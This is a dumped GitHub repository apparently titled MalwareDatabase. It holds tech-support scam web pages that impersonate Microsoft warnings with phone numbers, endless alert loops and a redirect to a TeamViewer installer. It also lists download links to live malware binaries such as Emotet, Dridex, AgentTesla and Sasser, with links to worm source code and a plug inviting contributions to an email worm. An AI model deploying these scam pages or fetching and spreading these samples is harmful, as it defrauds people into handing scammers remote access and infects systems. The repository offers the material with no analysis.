module&&module.exports&&(exports=module.exports=b),exports.Cookies=b):b,Retreaver.Base.Cookies=b}(),function(){var Base64={_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="};Base64.encode=function(a){var b,c,d,e,f,g,h,i="",j=0;for(a=Base64._utf8_encode(a);j>2,f=(3&b)<<4|c>>4,g=(15&c)<<2|d>>6,h=63&d,isNaN(c)?g=h=64:isNaN(d)&&(h=64),i=i+Base64._keyStr.charAt(e)+Base64._keyStr.charAt(f)+Base64._keyStr.charAt(g)+Base64._keyStr.charAt(h);return i},Base64.decode=function(a){var b,c,d,e,f,g,h,i="",j=0;for(a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");j>4,c=(15&f)<<4|g>>2,d=(3&g)<<6|h,i+=String.fromCharCode(b),64!=g&&(i+=String.fromCharCode(c)),64!=h&&(i+=String.fromCharCode(d));return i=Base64._utf8_decode(i)},Base64._utf8_encode=function(string){string=string.replace(eval("/\\r\\n/g"),eval("String('\\n')"));for(var utftext="",n=0;nc?utftext+=String.fromCharCode(c):c>127&&2048>c?(utftext+=String.fromCharCode(c>>6|192),utftext+=String.fromCharCode(63&c|128)):(utftext+=String.fromCharCode(c>>12|224),utftext+=String.fromCharCode(c>>6&63|128),utftext+=String.fromCharCode(63&c|128))}return utftext},Base64._utf8_decode=function(a){for(var b="",c=0,d=c1=c2=0;cd?(b+=String.fromCharCode(d),c++):d>191&&224>d?(c2=a.charCodeAt(c+1),b+=String.fromCharCode((31&d)<<6|63&c2),c+=2):(c2=a.charCodeAt(c+1),c3=a.charCodeAt(c+2),b+=String.fromCharCode((15&d)<<12|(63&c2)<<6|63&c3),c+=3);return b},Retreaver.Base.Base64=Base64}(),function(){var a=Retreaver.Base,b=function(b){function c(){a.assert_required_keys(b,"type","primary_key"),"undefined"==typeof Retreaver.Base.Data._store[b.type]&&(Retreaver.Base.Data._store[b.type]={}),"undefined"==typeof Retreaver.Base.Data._store[b.type][b.primary_key]&&(Retreaver.Base.Data._store[b.type][b.primary_key]={})}var d=this;d.get=function(){var a={};if("undefined"==typeof arguments[0])a=Retreaver.Base.Data._store[b.type][b.primary_key];else if(1===arguments.length)a=Retreaver.Base.Data._store[b.type][b.primary_key][arguments[0]];else for(var c=0;c0))break;d&&(b[a[c]]=d)}return b}function extractCookie(a){var b=new RegExp(a+"=([^;]*)","g");try{return b.exec(document.cookie)[1]}catch(c){return!1}}function findOne(a,b){for(var c in b)for(var d in a)if(d==b[c])return a[d];return!1}var self=this,config={},resource_url="/api/v1/numbers?";self.perform=function(callback){function sendGARequest(a,b){body.ga=Base64.encode(a),body.c=Base64.encode(JSON.stringify(b)),Request.connection().getJSON(request_url,body,callback)}if("function"!=typeof callback)throw"ArgumentError: Expected to receive a callback function";var request_url=resource_url+"&campaign_key="+config.campaign_key;config.default_number_replacement&&(request_url=request_url+"&default_number="+config.default_number_replacement),config.message_replacement&&(request_url=request_url+"&message="+config.message_replacement);var body=new Object,uri=document.location.href;body.u=Base64.encode(uri),body.st=Base64.encode(tags_to_script_tags(config.number_matching_tags));var ou=Cookies.get("CallPixels-ou");getParts([document.location.href]).cpreset||!ou?Cookies.set("CallPixels-ou",body.u):body.ou=ou;var ga_acct="FAILED";try{_gaq.push(function(){ga_acct=eval("_gat._getTrackerByName()._getAccount()"),sendGARequest(ga_acct,getGACookies())})}catch(e){try{ga(function(tracker){var clientId=tracker.get("clientId"),allTrackers=eval("ga.getAll()");ga_acct=allTrackers[0].get("trackingId");var ga_cookies={};ga_cookies.__utma=clientId,ga_cookies.mp="yes",sendGARequest(ga_acct,ga_cookies)})}catch(f){Request.connection().getJSON(request_url,body,callback)}}},initialize(options)};Retreaver.Base.RequestNumber=RequestNumber}(),window.Retreaver.Cache={},function(){function a(b){if("undefined"!=typeof Retreaver.Base.Data._store){var c=Retreaver.Base.Data._store.numbers;if("undefined"!=typeof c){var d={};for(var e in c){var f=c[e];"true"===f.is_active&&("undefined"==typeof d[f.campaign_key]&&(d[f.campaign_key]=[],d[f.campaign_key].ids=[],d[f.campaign_key].hashes=[]),d[f.campaign_key].ids.push(f.id),d[f.campaign_key].hashes.push(f.id_checksum))}for(var g in d){var h={ids:d[g].ids,hashes:d[g].hashes};Retreaver.Base.Request.connection().postJSON("/api/v1/numbers/ping",h,[Retreaver.Base.Model.update,b],this)}}}setTimeout(a,15e3)}var b=Retreaver.Base;Retreaver.Number=function(a){function c(a){g.store(a),g.set("is_active","true")}function d(a){return"string"==typeof a&&(a=Retreaver.Number.extract_tags_from_string(a)),{tag_values:a,ids:[e("id")],campaign_key:e("campaign_key")}}function e(a){return g.get(a)}function f(){if(g.get("is_per_visitor")===!1)throw"Error: Tried to add tags to non per-visitor number."}var g=this;g.type="numbers",g.add_tags=function(a,b){f(),g.post_data("numbers/tag",d(a),b)},g.remove_tags=function(a,b){f(),g.post_data("numbers/untag",d(a),b)},g.remove_tags_by_keys=function(a,b){f(),"string"==typeof a&&(a=a.split(","));var c={tag_keys:a,ids:[e("id")],campaign_key:e("campaign_key")};g.post_data("numbers/untag/keys",c,b)},g.clear_tags=function(a){f();var b={ids:[e("id")],campaign_key:e("campaign_key"),all:"true"};g.post_data("numbers/untag",b,a)},g.release=function(){g.set("is_active","false")},g.initiate_call=function(a,c,d){"undefined"==typeof c&&(c={}),c.dial=a,c=b.merge(g.get("id","campaign_key"),c),g.post_data("numbers/initiate_call",c,d)},c(a)},Retreaver.Number.extract_tags_from_string=function(a){for(var b={},a=a.split(","),c=0;c 2 | 4 | 7 | 8 | 10 | 13 | 20 | 24 | 27 | 31 | 33 | 35 | 38 | 39 | 40 | -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/firiedge/a.mp3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake MacOS Infection/firiedge/a.mp3 -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/firiedge/defender.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake MacOS Infection/firiedge/defender.png -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/firiedge/favico.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake MacOS Infection/firiedge/favico.jpg -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/firiedge/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Microsoft Windows Notification 9 | 10 | 11 | 12 | 13 | 14 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | ** YOUR COMPUTER WAS LOCKED ** 41 | Error # DT00X02. 42 | 43 | Call Microsoft Technical Suppport: 44 | +1-844-589-2165(Toll-Free): 45 | Do Not Ignore This Important Warning 46 | If you close this page without resolving issue, access to your computer will be disabled to prevent further damage to our network. 47 | 48 | Your computer has alerted us that it was infected with virus and spyware. The following data is at risk: 49 | 50 | 1. Facebook Login 51 | 2. Credit Card Information 52 | 3. Email Credentials 53 | 4. Browsing History and Data 54 | 55 | You must contact us immediately so our engineers can guide you through the recovery process by phone. Please call us within the next 5 minutes to prevent complete loss of your computer. 56 | 57 | 58 | Contact Microsoft Engineer: +1-844-589-2165 (Toll-Free) 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | x 68 | Security Warning: 69 | 70 | ** YOUR COMPUTER WAS LOCKED ** 71 | Error # DT00X2. 72 | 73 | Call Microsoft Technical Support at: +1-844-589-2165 74 | Do Not Ignore This Important Warning 75 | If you close this page without resolving issue, access to your computer will be disabled to prevent further damage to our network. 76 | Your computer has alerted us that it was infected with virus and spyware. The following data is at risk: 77 | 78 | 1. Facebook Login 79 | 2. Credit Card Information 80 | 3. Email Credentials 81 | 4. Browsing History and Data 82 | 83 | You must contact us immediately so our engineers can guide you through the recovery process by phone. Please call us within the next 5 minutes to prevent complete loss of your computer. 84 | Contact Microsoft Engineer: +1-844-589-2165 (Toll-Free) 85 | 86 | 87 | Prevent this page from creating additional dialogues. sereno 88 | OK 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/firiedge/login.php: -------------------------------------------------------------------------------- 1 | Internet Security Damaged !!! Call Help Desk"; 23 | 24 | 25 | exit; 26 | } 27 | } else { 28 | 29 | header('Location: login.php'); 30 | header('Location: http://download.teamviewer.com/download/TeamViewer_Setup_en.exe'); 31 | 32 | exit; 33 | } 34 | ?> 35 | -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/ie.svg: -------------------------------------------------------------------------------- 1 | 2 | 4 | 7 | 8 | 10 | 12 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake MacOS Infection/logo.png -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Block/405.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Microsoft Block/405.zip -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Block/files/alert.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Microsoft Block/files/alert.jpg -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Block/files/alertmicrosoft.mp3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Microsoft Block/files/alertmicrosoft.mp3 -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Block/files/background-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Microsoft Block/files/background-2.png -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Block/files/microsoft.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Microsoft Block/files/microsoft.png -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Block/files/style.css: -------------------------------------------------------------------------------- 1 | @import 'https://fonts.googleapis.com/css?family=Open+Sans:400,600,700'; 2 | html, 3 | body { 4 | margin: 0; 5 | padding: 0; 6 | font-family: 'Titillium Web', sans-serif 7 | } 8 | 9 | .container { 10 | width: 100%; 11 | overflow-x: hidden; 12 | position: relative; 13 | } 14 | 15 | p { 16 | margin: 0 17 | } 18 | 19 | #map { 20 | display: block; 21 | position: absolute; 22 | top: 20px; 23 | left: calc(50% - 400px); 24 | width: 800px; 25 | margin: 0 auto; 26 | z-index: 7000 27 | } 28 | 29 | #second_alert { 30 | width: 430px; 31 | margin: 0 auto; 32 | position: relative 33 | } 34 | 35 | #second_alert img { 36 | width: 100% 37 | } 38 | 39 | #phoneal { 40 | position: absolute; 41 | top: 250px; 42 | left: 45px; 43 | font-size: 14px; 44 | font-weight: 700; 45 | color: #000 46 | } 47 | 48 | #secpage { 49 | position: absolute; 50 | left: 7.5%; 51 | top: 12%; 52 | width: 85%; 53 | color: #3B5998; 54 | text-align: center; 55 | font-family: 'Open Sans', sans-serif; 56 | color: #000; 57 | } 58 | .lokacioni{ 59 | font-weight: 600; 60 | font-size: 32px; 61 | } 62 | .lokacioni2{ 63 | font-size: 26px; 64 | font-weight: 600 65 | } 66 | .lokacioni3{ 67 | font-size: 26px; 68 | font-weight: 700 69 | } 70 | #thirdpage{ 71 | position: absolute; 72 | left: 7.5%; 73 | top: 60%; 74 | width: 85%; 75 | color: #3B5998; 76 | text-align: center; 77 | font-family: 'Open Sans', sans-serif; 78 | color: #000; 79 | } 80 | 81 | #nmb { 82 | font-weight: 700 83 | } 84 | /*bubble*/ 85 | .bubble{ 86 | display: none; 87 | width: 200px; 88 | padding: 10px 15px; 89 | border-radius: 15px; 90 | position: absolute; 91 | bottom: 14px; 92 | right: 15px; 93 | background-color: #fff; 94 | border: 1px solid #878787; 95 | z-index: 99999; 96 | font-family: 'Roboto', sans-serif; 97 | font-size: 14px; 98 | line-height: 20px; 99 | font-weight: 500; 100 | color: #444; 101 | text-align: center; 102 | opacity: 0; 103 | } 104 | 105 | 106 | .bubble:after, .bubble:before { 107 | top: 100%; 108 | left: 45px; 109 | border: solid transparent; 110 | content: " "; 111 | height: 0; 112 | width: 0; 113 | position: absolute; 114 | pointer-events: none; 115 | } 116 | 117 | .bubble:after { 118 | border-color: rgba(255, 255, 255, 0); 119 | border-top-color: #ffffff; 120 | border-width: 12px; 121 | margin-left: -12px; 122 | } 123 | .bubble:before { 124 | border-color: rgba(135, 135, 135, 0); 125 | border-top-color: #878787; 126 | border-width: 13px; 127 | margin-left: -13px; 128 | } 129 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Block/files/warning.mp3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Microsoft Block/files/warning.mp3 -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Block/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Microsoft Official Support 9 | 10 | 11 | 12 | 13 | 14 | 17 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | Windows Has Detected a Malicious Virus On Your System 97 | 98 | Do Not Shutdown Or Restart Your Computer 99 | Contact Our Certified Windows Technicians For Immediate Assistance 100 | 101 | 102 | 103 | 104 | Contact Our Certified Windows Technicians For Immediate Assistance 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | Microsoft Error: Unknown System Failure! 121 | 122 | 123 | 124 | 125 | Call tech support... 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Block/msie1.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Microsoft Official Support 9 | 10 | 11 | 12 | 13 | 16 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | Windows Has Detected a Malicious Virus On Your System 96 | 97 | Do Not Shutdown Or Restart Your Computer 98 | Contact Our Certified Windows Technicians For Immediate Assistance 99 | 100 | 101 | 102 | 103 | Contact Our Certified Windows Technicians For Immediate Assistance 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | Microsoft Error: Unknown System Failure! 120 | 121 | 122 | 123 | 124 | Call tech support... 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Block/msie2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Microsoft Official Support 9 | 10 | 11 | 12 | 13 | 16 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | Windows Has Detected a Malicious Virus On Your System 95 | 96 | Do Not Shutdown Or Restart Your Computer 97 | Contact Our Certified Windows Technicians For Immediate Assistance 98 | 99 | 100 | 101 | 102 | Contact Our Certified Windows Technicians For Immediate Assistance 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | Microsoft Error: Unknown System Failure! 119 | 120 | 121 | 122 | 123 | Call tech support... 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 158 | 159 | 160 | 161 | 168 | 169 | 170 | 171 | 172 | 173 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/a.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 404 Not Found 4 | 5 | Not Found 6 | The requested URL /Index/chrome/chrome-assests/a.htm was not found on this server. 7 | Additionally, a 404 Not Found 8 | error was encountered while trying to use an ErrorDocument to handle the request. 9 | 10 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/alert.css: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/gb.mp3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Microsoft Support/chrome-assests/gb.mp3 -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/ie10-viewport-bug-workaround.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 404 Not Found 4 | 5 | Not Found 6 | The requested URL /Index/chrome/chrome-assests/ie10-viewport-bug-workaround.css was not found on this server. 7 | Additionally, a 404 Not Found 8 | error was encountered while trying to use an ErrorDocument to handle the request. 9 | 10 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/iframe.js: -------------------------------------------------------------------------------- 1 | window.addEventListener('resize', function(){ 2 | if(screen.width === window.innerWidth){ 3 | document.getElementById('auth').innerHTML = ""; 4 | } 5 | 6 | setInterval(function () { alert("Your computer is in blocked state.\nSYSTEM WARNING :\nDO NOT PRESS ANY KEY UNTIL YOU KNOW SAFE SIDE INSTRUCTIONS.\n For saftey instructions immediately call on the support number , a Microsoft Super Technician is waiting to guide you to safeguard your system.\nYou must not avoid this warning , as this is a very critical infection.\nMicrosoft Super Technicians are level 9 technicians which are expertise in resolving these kind of issues.\nTHIS CALL IS A TOLL FREE CALL. ") }, 0000); 7 | 8 | 9 | 10 | }); 11 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/images.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Microsoft Support/chrome-assests/images.zip -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/img-1.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/img-10.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/img-11.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/img-12.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/img-2.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/img-3.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/img-4.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/img-5.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/img-6.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/img-7.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/img-8.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/img-9.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/microsoft.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Microsoft Support/chrome-assests/microsoft.png -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/index.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Microsoft Support/index.html -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/murphy_chrome.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Microsoft Support/murphy_chrome.zip -------------------------------------------------------------------------------- /スティーラー/Azorult.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/スティーラー/Azorult.exe -------------------------------------------------------------------------------- /スティーラー/Lokibot.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/スティーラー/Lokibot.exe -------------------------------------------------------------------------------- /スパイウェア/AgentTesla.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/スパイウェア/AgentTesla.exe -------------------------------------------------------------------------------- /スパイウェア/Kakwa.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/スパイウェア/Kakwa.doc -------------------------------------------------------------------------------- /スパイウェア/The Worst Of All!!!!!!/BonziBUDDY!!!!!!.txt: -------------------------------------------------------------------------------- 1 | Download Link: https://www.bonzi.link/ 2 | 3 | Expand Dong!!!!!! 4 | -------------------------------------------------------------------------------- /スパイウェア/butterflyondesktop.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/スパイウェア/butterflyondesktop.exe -------------------------------------------------------------------------------- /ネットワーム/Blaster/Blaser.C.sourcecode.txt: -------------------------------------------------------------------------------- 1 | https://gist.github.com/yorickdewid/a9fb98da3c367b360e36 2 | -------------------------------------------------------------------------------- /ネットワーム/Blaster/Blaster.A.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ネットワーム/Blaster/Blaster.A.exe -------------------------------------------------------------------------------- /ネットワーム/Blaster/Blaster.E.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ネットワーム/Blaster/Blaster.E.exe -------------------------------------------------------------------------------- /ネットワーム/CodeRed.a.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ネットワーム/CodeRed.a.exe -------------------------------------------------------------------------------- /ネットワーム/EternalRocks.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ネットワーム/EternalRocks.exe -------------------------------------------------------------------------------- /ネットワーム/Kolabc/Kobalc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ネットワーム/Kolabc/Kobalc.exe -------------------------------------------------------------------------------- /ネットワーム/Loveware.txt: -------------------------------------------------------------------------------- 1 | Hello! Please check out my project on github. 2 | It is called Loveware, an email and net-worm. 3 | 4 | You can participate in the project if you want, 5 | because this peace of malware is community driven. 6 | 7 | Official Repository: https://github.com/TheG0df2ther/Loveware/blob/master/Loveware/Loveware.bat 8 | 9 | Regards, 10 | 11 | TheG0df2ther 12 | -------------------------------------------------------------------------------- /ネットワーム/Opaserv.l.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ネットワーム/Opaserv.l.exe -------------------------------------------------------------------------------- /ネットワーム/Rahack/Rahack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ネットワーム/Rahack/Rahack.exe -------------------------------------------------------------------------------- /ネットワーム/Sasser/Sasser.A.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ネットワーム/Sasser/Sasser.A.exe -------------------------------------------------------------------------------- /ネットワーム/Sasser/Sasser.B.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ネットワーム/Sasser/Sasser.B.exe -------------------------------------------------------------------------------- /ネットワーム/Sasser/Sasser.c.sourcecode.txt: -------------------------------------------------------------------------------- 1 | https://github.com/yorickdewid/Sasser 2 | -------------------------------------------------------------------------------- /バンキングマルウェア/DanaBot.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/バンキングマルウェア/DanaBot.exe -------------------------------------------------------------------------------- /バンキングマルウェア/Dridex/Dridex.JhiSharp.dll.9d75ff0e9447ceb89c90cca24a1dbec1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/バンキングマルウェア/Dridex/Dridex.JhiSharp.dll.9d75ff0e9447ceb89c90cca24a1dbec1 -------------------------------------------------------------------------------- /バンキングマルウェア/Dridex/DridexDroppedVBS.925da3a10f7dde802c8d87047b14fda6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/バンキングマルウェア/Dridex/DridexDroppedVBS.925da3a10f7dde802c8d87047b14fda6 -------------------------------------------------------------------------------- /バンキングマルウェア/Dridex/DridexLoader.bin.exe.c26203af4b3e9c81a9e634178b603601: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/バンキングマルウェア/Dridex/DridexLoader.bin.exe.c26203af4b3e9c81a9e634178b603601 -------------------------------------------------------------------------------- /バンキングマルウェア/Dridex/Trojan.Dridex.A. dbf96ab40b728c12951d317642fbd9da: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/バンキングマルウェア/Dridex/Trojan.Dridex.A. dbf96ab40b728c12951d317642fbd9da -------------------------------------------------------------------------------- /バンキングマルウェア/Dridex/Trojan.Dridex.A.6164228ed2cc0eceba9ce1828d87d827: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/バンキングマルウェア/Dridex/Trojan.Dridex.A.6164228ed2cc0eceba9ce1828d87d827 -------------------------------------------------------------------------------- /バンキングマルウェア/Dridex/Trojan.Dridex.A.97a26d9e3598fea2e1715c6c77b645c2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/バンキングマルウェア/Dridex/Trojan.Dridex.A.97a26d9e3598fea2e1715c6c77b645c2 -------------------------------------------------------------------------------- /バンキングマルウェア/Emotet.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/バンキングマルウェア/Emotet.zip -------------------------------------------------------------------------------- /バンキングマルウェア/Zloader.xlsm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/バンキングマルウェア/Zloader.xlsm -------------------------------------------------------------------------------- /ブラウザーハイジャック/BabylonToolbar.txt: -------------------------------------------------------------------------------- 1 | Download Link: https://www.babylon-software.com/download 2 | -------------------------------------------------------------------------------- /ポニー/metrofax.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ポニー/metrofax.doc 